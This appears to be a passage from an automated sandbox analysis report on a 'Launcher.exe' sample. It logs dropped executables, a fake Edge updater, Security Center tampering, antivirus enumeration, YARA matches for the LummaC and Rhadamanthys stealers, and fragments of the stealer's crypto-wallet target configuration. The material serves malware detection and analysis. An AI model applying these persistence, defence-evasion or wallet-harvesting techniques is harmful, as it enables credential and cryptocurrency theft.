                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeQueries volume information: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,28_2_0020E6D7
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: svchost.exe, 00000006.00000002.2498789197.00000255BAD02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000006.00000002.2498789197.00000255BAD02000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693701683.000000000158E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: 29.2.xzuucncwbxucqic.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.xzuucncwbxucqic.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.2494852918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001E.00000003.1861315526.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000003.1865638072.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.1935737498.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.1865565180.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lectrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets",
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: h\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0
